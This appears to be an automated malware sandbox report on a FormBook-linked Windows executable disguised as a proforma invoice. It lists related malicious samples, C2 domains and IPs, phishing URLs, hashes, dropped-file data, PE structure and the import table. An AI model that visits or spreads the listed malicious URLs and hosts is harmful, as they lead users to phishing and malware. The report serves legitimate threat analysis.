DO-COSU6387686280.pdf.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.krshop.shop/grhe/
Fiş.exe | Get hash | malicious | FormBook | Browse | www.a1shop.shop/5cnx/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context

Match: www.optimismbank.xyz
PAYROLL LIST.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
SWIFT COPY 0028_pdf.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48

Match: www.bankseedz.info
PAYROLL LIST.exe | Get hash | malicious | FormBook | Browse | 46.30.211.38

Match: www.madhf.tech
Quotation Validity.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 103.224.182.242
BASF Hungária Kft.exe | Get hash | malicious | FormBook | Browse | 15.204.67.7
Purchase Order PO.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 103.224.182.242
Payment_Confirmation_pdf.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 103.224.182.242
PAYROLL LIST.exe | Get hash | malicious | FormBook | Browse | 103.224.182.242
Purchase Order PO.exe | Get hash | malicious | FormBook | Browse | 103.224.182.242
Thermo Fisher Scientific - Ajánlatkérés.exe | Get hash | malicious | FormBook | Browse | 103.224.182.242
SWIFT COPY 0028_pdf.exe | Get hash | malicious | FormBook | Browse | 103.224.182.242
Item-RQF-9456786.exe | Get hash | malicious | Unknown | Browse | 103.224.182.242

Match: r0lqcud7.nbnnn.xyz
lKvXJ7VVCK.exe | Get hash | malicious | FormBook | Browse | 23.225.159.42
BASF Hungária Kft.exe | Get hash | malicious | FormBook | Browse | 27.124.4.246
specifications.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 23.225.159.42
OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | 202.79.161.151
ARRIVAL NOTICE.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 202.79.161.151
OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | 27.124.4.246
REQUESTING FOR UPDATED SOA.exe | Get hash | malicious | FormBook | Browse | 23.225.160.132
PAYROLL LIST.exe | Get hash | malicious | FormBook | Browse | 23.225.160.132
purchase Order.exe | Get hash | malicious | FormBook | Browse | 27.124.4.246
Thermo Fisher Scientific - Ajánlatkérés.exe | Get hash | malicious | FormBook | Browse | 202.79.161.151
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context

Match: CLOUDFLARENETUS
https://www.alessiabelltravel.com | Get hash | malicious | Unknown | Browse | 104.17.25.14
l6F8Xgr0Ov.exe | Get hash | malicious | AgentTesla | Browse | 104.26.12.205
SPlVyHiGOz.exe | Get hash | malicious | AgentTesla, DarkTortilla | Browse | 172.67.74.152
https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-# | Get hash | malicious | Unknown | Browse | 104.21.11.98
55qIbHIAZi.exe | Get hash | malicious | AgentTesla, DarkTortilla | Browse | 172.67.74.152
tEEa6j67ss.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
file.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.16.9
Quotation Validity.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 172.67.158.106
https://merchbkofin.com/ | Get hash | malicious | Unknown | Browse | 172.64.153.42
Quotation.exe | Get hash | malicious | Lokibot, PureLog Stealer | Browse | 104.21.12.202

Match: AMAZON-02US
https://fn-fi.jimdosite.com | Get hash | malicious | HTMLPhisher | Browse | 54.73.104.6
https://www.alessiabelltravel.com | Get hash | malicious | Unknown | Browse | 13.226.2.26
https://management.sigmaonline.ro/newsletter_re_news.php?from_email=&abonat_id=&newsletter_id=773&followLink=http://ezp-prod1.hul.harvard.edu/login?url=https://accotoxtnation.es/mime/#Y25pY2hvbHNAZGVyaWNrZGVybWF0b2xvZ3kuY29t | Get hash | malicious | HTMLPhisher | Browse | 13.227.8.72
https://secure_sharing0utlook.wesendit.com/dl/ON6fQWpNLtFc53e1u/bWlrZS5zbGVpZ2h0QGtlbXRpbGUuY28udWs | Get hash | malicious | HTMLPhisher | Browse | 3.64.82.26
https://atpscan.global.hornetsecurity.com/?d=m-jrZYNTvS7OucEG6zgopo_P-eFuotBy6khKzMMoLZ4&f=B3z_aD7k-FJHzGTgRypMC4okZ3IwSory4vTIxE3HdJ_vtmaZKtKUThjBimGO9ug0&i=&k=4AW8&m=GVQPkt_RSTiDpwD3aZUptFFr0zCshjoFLqhJ3NjtibWBkTpV22jDRnOpUHUftsT9uvGtNvEk65KPlyjsi0fzlHEgnGzER6prH6oEwQ6iGZMuyrzkW43X0VpXiLTd8OwU&n=LPqMxEbLmB_Zh1f7NoMu0JEABS3tNgPjYsrca87TqctDejHSuebypqLStQvhBN5eG43hQ2ReWbrTClyFyYZQHA&r=-0Amt46rVl0s1yn8_P2jWFIQhQ5qvzjVNyyZ7Ng6X4pWNR2O0BffN49tqRoSmkJg&s=ef9a322854c7503d3037fcbcda0a6c433cee94d107fe0a8ab1fda12b2f14509b&u=https%3A%2F%2Fsecure_sharing0utlook.wesendit.com%2Fdl%2FON6fQWpNLtFc53e1u%2FbWlrZS5zbGVpZ2h0QGtlbXRpbGUuY28udWs | Get hash | malicious | Unknown | Browse | 3.64.82.26
https://bielefelde.de/ | Get hash | malicious | Unknown | Browse | 108.158.75.57
http://idiomas.astalaweb.com/otros/Portugu%C3%A9s/Comunicacion-verbos-en-portugues.asp | Get hash | malicious | Unknown | Browse | 52.11.244.148
http://espanyol-hjfcghmvhjvmhcdhxtxhsallkkkjjggdsd.static.hf.space | Get hash | malicious | Unknown | Browse | 13.227.2.22
lKvXJ7VVCK.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
sora.mpsl.elf | Get hash | malicious | Unknown | Browse | 54.171.230.55

Match: MULTIBAND-NEWHOPEUS
Quotation Validity.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 209.74.77.107
specification and drawing.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 209.74.64.187
Order MEI PO IM202411484.exe | Get hash | malicious | FormBook | Browse | 209.74.77.108
specifications.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 209.74.77.107
A2028041200SD.exe | Get hash | malicious | FormBook | Browse | 209.74.77.109
OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | 209.74.77.107
CV_ Filipa Barbosa.exe | Get hash | malicious | FormBook | Browse | 209.74.77.108
ARRIVAL NOTICE.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 209.74.77.107
Payment_Confirmation_pdf.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 209.74.77.108
OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | 209.74.77.107

No context
No context
Process: C:\Windows\SysWOW64\waitfor.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
Preview: SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe
File Type: data
Category: dropped
Size (bytes): 290304
Entropy (8bit): 7.992296918729059
Encrypted: true
SSDEEP: 6144:N3ZHBk+srqXwAQoWbCGYdBrnjVif6glb6oIfU0kZtBjDNQgAZGNQQY:NJHbJgAwbMB7ZifHl2RuZbNn5NJY
MD5: 8CA8A4520B2F37B13D944F19071AEC67
SHA1: 4D01CE528208C32E72DEE5B568F23F1B6B47FDD8
SHA-256: 699FCD72FA754813C7D5BD87F1854D81E13B45535885D6865CDC093835F0B81E
SHA-512: 482E3EC97ECE219EF619697D16C1660874C653B25266396A0CA52C2816B52B934CE839535330DDB43708F42BBB8BB31163E6621677611DB2C4921DAF043BDFE4
Malicious: false
Reputation: low
Preview: xn.FBO2ABVHA..65.JFAO2AF.HAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ6.4JFOP.OF.A.w.7y.k.)&Aa6$'&$0[.W+(/ Fa$3h3#?.\Zj....,)2-o[\<.4JFAO2A?WA.k1Q..*!.rR&.L..kVR.P...!!.R....US..(,Z|&1.AVQ654JF..2A.WIA..ti4JFAO2AF.HCWZ7>4J.EO2AFVHAVQ.!4JFQO2A6RHAV.65$JFAM2A@VHAVQ652JFAO2AFV8EVQ454JFAO0A..HAFQ6%4JFA_2AVVHAVQ6%4JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAx%SM@JFA.iEFVXAVQj14JVAO2AFVHAVQ654JfAORAFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFV
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.189673969750801
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Proforma invoice - Arancia NZ.exe
File size: 1'207'808 bytes
MD5: a4c3a56e6258ea94065bf7151009d43c
SHA1: c4d4d96374381d46051521ff82d3bf9bfb405c38
SHA256: 87e59a4758499e2544872d9ad64c561b1fc62290c4420fd9caca07f0e6e830aa
SHA512: 690ccebe51b2285d3a74a33b76eb89de615896a3ea1649749858d6b54fa90c5f803ec7bcb525d2e952db0d6a31fe4ea2193e375007acbfe5b8587342c36f1c0f
SSDEEP: 24576:Lu6J33O0c+JY5UZ+XC0kGso6Fa58SiZoZuGbcA6VKdGmWY:lu0c++OCvkGs9Fa58HKu8cAZdmY
TLSH: D245CF2273DDC361CB669173BF6AB7016EBF3C614630B85B2F980D7DA950161162CBA3
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                                                  Icon Hash:aaf3e3e3938382a0
                                                                                                                  Entrypoint:0x427dcd
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x674CF56D [Sun Dec 1 23:46:53 2024 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7
Instruction
call 00007F0D5D1C1BAAh
jmp 00007F0D5D1B4974h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F0D5D1B4AFAh
cmp edi, eax
jc 00007F0D5D1B4E5Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F0D5D1B4AF9h
rep movsb
jmp 00007F0D5D1B4E0Ch
cmp ecx, 00000080h
jc 00007F0D5D1B4CC4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F0D5D1B4B00h
bt dword ptr [004BE324h], 01h
jc 00007F0D5D1B4FD0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F0D5D1B4C9Dh
test edi, 00000003h
jne 00007F0D5D1B4CAEh
test esi, 00000003h
jne 00007F0D5D1B4C8Dh
bt edi, 02h
jnc 00007F0D5D1B4AFFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F0D5D1B4B03h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F0D5D1B4B55h
bt esi, 03h
jnc 00007F0D5D1B4BA8h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5e508 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x126000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5e508 | 0x5e600 | 57c459ecdaa3658fa2b8ecbc13cf14f2 | False | 0.930404076986755 | data | 7.89991585410463 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x126000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x557cf | data | | | 1.000331278076531
RT_GROUP_ICON | 0x124f88 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x125000 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x125014 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x125028 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x12503c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x125118 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
